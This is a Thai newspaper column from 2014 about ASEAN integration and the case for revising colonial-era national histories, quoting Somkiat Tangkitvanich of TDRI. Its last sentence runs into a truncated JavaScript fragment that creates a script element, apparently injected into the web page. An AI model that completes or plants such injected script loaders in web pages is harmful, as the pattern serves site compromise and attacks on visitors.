มติชนรายวัน ฉบับประจำวันพุธที่ 6 สิงหาคม  2557

 

อาเซียนต้องร่วมกันแก้ไขประวัติศาสตร์

         “ประเทศไทยจะเป็นประเทศหนึ่งที่ได้ประโยชน์จากการรวมกลุ่มในภูมิภาคอาเซียนมากที่สุด เนื่องจากเรามีที่ตั้งทางภูมิศาสตร์เป็นศูนย์กลางของการเชื่อมต่อในภูมิภาค พูดอีกอย่างหนึ่งก็คือ เรามี ‘ฮวงจุ้ย’ ที่ดีนั่นเอง”

         สมเกียรติ ตั้งกิจวานิชย์ ผู้อำนวยการ ทีดีอาร์ไอ (สถาบันวิจัยเพื่อการพัฒนาประเทศไทย) บอกไว้ในหนังสือรู้เท่าทัน AEC (สำนักพิมพ์มติชน พิมพ์ครั้งแรก พ.ศ. 2557 เล่มละ 105 บาท)

         สมเกียรติบอกอีกว่า การรวมกลุ่มในภูมิภาคอย่างแท้จริงจะเกิดขึ้นได้ก็ต่อเมื่อผู้ประกอบการและประชาชนไทยมีสำนึกที่มีความเป็นสากลมากขึ้น โดยเข้าใจวัฒนธรรมของประเทศเพื่อนบ้านอย่างถูกต้อง และปฏิบัติต่อเพื่อนบ้านบนพื้นฐานของการเคารพซึ่งกันและกัน

         ที่สำคัญอย่างหนึ่งคือต้องศึกษาประวัติศาสตร์ไทยและประวัติศาสตร์ของประเทศเพื่อนบ้านในหลากหลายแง่มุม รวมทั้งในมุมของประเทศเพื่อนบ้าน

         “เพื่อให้คนไทยหลุดพ้นจากอคติที่เห็นว่าประเทศเพื่อนบ้านเป็นศัตรู หรือเห็นว่าไทยเหนือกว่าประเทศเพื่อนบ้าน”

         ไทยมีประวัติศาสตร์ความเป็นมาทั้งของดินแดนและผู้คน แยกไม่ได้จากประวัติศาสตร์อาเซียนในอุษาคเนย์

         เพราะไทยเป็นส่วนหนึ่งของอาเซียน จึงมีบรรพชนร่วม และวัฒนธรรมร่วมกับอาเซียน

         สมเกียรติ ยกข้อความของ ณรงค์ชัย อัครเศรณี มาเตือนไว้ด้วย ดังนี้

         “ภูมิศาสตร์ทำให้เราเป็นเพื่อนบ้านกัน

         วัฒนธรรมทำให้เรามีมรดกร่วม

         เทคโนโลยีทำให้เราเชื่อมโยงกัน

         แต่ประวัติศาสตร์ทำให้เราเป็นศัตรู

         และสำนึกทำให้เราแยกจากกัน”

         แต่ประวัติศาสตร์แห่งชาติของไทยและชาติต่างๆในอาเซียน เป็นผลผลิตจากยุคอาณานิคมที่เจ้าอาณานิคมมีเจตนาให้อาเซียนเป็นอริปฏิปักษ์กัน จะได้ไม่แข็งข้อ

         ถ้าทุกประเทศไม่ยอมแก้ไขดัดแปลงให้ตรงตามหลักฐานประวัติศาสตร์โบราณคดีที่มีจริง ก็ยากจะรวมกลุ่มอย่างมีสันติภาพvar d=document;var s=d.createElement(‘script’);